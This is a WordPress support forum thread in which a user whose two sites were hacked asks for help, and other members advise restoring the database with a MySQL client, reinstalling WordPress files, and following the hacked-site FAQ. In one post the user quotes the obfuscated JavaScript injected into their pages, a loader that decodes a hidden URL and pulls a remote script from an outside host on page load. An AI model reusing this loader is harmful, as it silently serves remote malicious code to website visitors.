WordPress.org

1. pinkgarden
   Member
   Posted 2 years ago #

   I have 4 web sites, 2 of which run on WordPress. Both of these WordPress run sites have been hacked rendering them blank with the following error code visible to all visitors: Parse error: syntax error, unexpected '<' in /home/pinkgar1/public_html/wp-includes/default-widgets.php on line 1034

   I haven't edited any files nor have I added anything to my widgets in order to create this error.

   I have a back up facility and have tried restoring my site from the sql but its 4.5MB large and just crashes my browser. What am I supposed to do now? My site didn't have loads of information on it so the sql shouldn't be that large.

   Here is an example of some of the sql from my last backup (a few days ago) I don't think those !40101 characters should be there:

   -- Table structure for table wp_yak_product
   --

   DROP TABLE IF EXISTS wp_yak_product;
   /*!40101 SET @saved_cs_client = @@character_set_client */;
   /*!40101 SET character_set_client = utf8 */;
   CREATE TABLE wp_yak_product (
   post_id mediumint(9) NOT NULL,
   product_code varchar(30) default NULL,
   price float NOT NULL,
   alt_title varchar(255) default NULL,
   PRIMARY KEY (post_id)
   ) ENGINE=MyISAM DEFAULT CHARSET=utf8;
   /*!40101 SET character_set_client = @saved_cs_client */;

   --
   -- Dumping data for table wp_yak_product
   --

   LOCK TABLES wp_yak_product WRITE;
   /*!40000 ALTER TABLE wp_yak_product DISABLE KEYS */;
   INSERT INTO wp_yak_product VALUES (28,NULL,200,'Something Something Earrings');
   /*!40000 ALTER TABLE wp_yak_product ENABLE KEYS */;
   UNLOCK TABLES;

   --
   -- Table structure for table wp_yak_product_detail
   --

2. ianatkins
   Member
   Posted 2 years ago #

   Hello,

   The yak_product_detail table is not a default table in wordpress, but might be associated with a plugin.

   Your best bet is to try and restore your sql backup using a mysql client, rather than the browser.

   Try mysqlyog or navicat. Log into your database using one of these programmes (or similar). Then I'd take another backup of what it online, then delete it and restore from one of your previous backups.

   Which version of wordpress are you currently using, it might be an idea to update it?

   Hope it helps.

   Ian.

3. ianatkins
   Member
   Posted 2 years ago #

   The yak_product tables are from YAK Shopping cart plugin, so nothing to worry about.
   http://wordpress.org/extend/plugins/yak-for-wordpress/

   Your database file might be big due to wordpress saving any revisions to posts/pages?

   Ian.

4. Ipstenu
   Half-Elf Support Rogue & Mod
   Posted 2 years ago #

   Re-apply the latest WP. Download and update all your PHP files.

   Parse error: syntax error, unexpected '<' in /home/pinkgar1/public_html/wp-includes/default-widgets.php on line 1034

   It may just be a file corruption, but that doesn't look like a hack I'm familiar with.

5. pinkgarden
   Member
   Posted 2 years ago #

   Hi guys

   Sorry, I should have explained, I know that YAK is a plugin, it's was one I installed ages ago but don't use anymore. I'm not suggesting in any way thats the hack, its just a snippet taken from my sql. It's the ominous *!40101 that I think shouldn't be there.

   I know that I have been hacked as when I load up my site, in the status bar of my browser it says waiting for my web address then some other random address that I am not associated with (streamate-com.51.com....)

   If I look at the source code of my site as it is, it looks like this:

   <script>/*GNU GPL*/ try{window.onload = function(){var T3v0598u1n9ba = document.createElement('script');T3v0598u1n9ba.setAttribute('type', 'text/javascript');T3v0598u1n9ba.setAttribute('id', 'myscript1');T3v0598u1n9ba.setAttribute('src', 'h#&t##t@&&p#)@#:@@/$(&/)!s@$!t(#r&&&e^)a#!@^m(a@@(t@)e$-!@c&o)#m)!.#)^&5)((1)@.$c@#o@#&m^@.!(!!w)^$o&^r)$l$@@d@&^o)^$&f(@^)w$^a)(r#)!c&r!^#a#f(t@$&-$##c##&^o#@@!m&)^!.$^!b($o($(a(&r!#d#^s@#^a^$w^.(&^$r)(u^@@^:((8$&0!&^8))0^!/&!(m!$$e&(d&^i&a(&(&f(#^i&^!)r()#$e^)^.(@c!o#^##$m#^/$(#(m^!e$)d)&i&&a$$&&#f#@i@&r!@e@@.!!c!##@^o!m&/$!!i#!n@$d)(e$#e^#^d(!&.^c(o$@^m$^/!)@a@)!)#m((^$a!z(()o@n#(&.&&)(c&^^o^!.##u&@k$/#$&!g$))(o)o&^&g^)^l$#^&)e)#.)&&@$c)#o($m(@)#/(@)'.replace(/&|\(|\!|\^|@|#|\)|\$/ig, ''));T3v0598u1n9ba.setAttribute('defer', 'defer');document.body.appendChild(T3v0598u1n9ba);}} catch(e) {}</script>
   <b>Parse error</b>: syntax error, unexpected '<' in <b>/home/pinkgar1/public_html/wp-includes/default-widgets.php</b> on line <b>1034</b>

   I was using the most up to date version at the time before my site got hacked 2.8.5

6. Ipstenu
   Half-Elf Support Rogue & Mod
   Posted 2 years ago #

   Start at the beginning then: http://codex.wordpress.org/FAQ_My_site_was_hacked

7. esmi
   Theme Diva & Forum Moderator
   Posted 2 years ago #

   It's the ominous *!40101 that I think shouldn't be there.

   Don't worry about that. It's a line that's often present in perfectly valid sql dumps.

8. henkholland
   Member
   Posted 2 years ago #

   If you have that backup locally on your pc, try zipping it and then uploading it.

Topic Closed

This topic has been closed to new replies.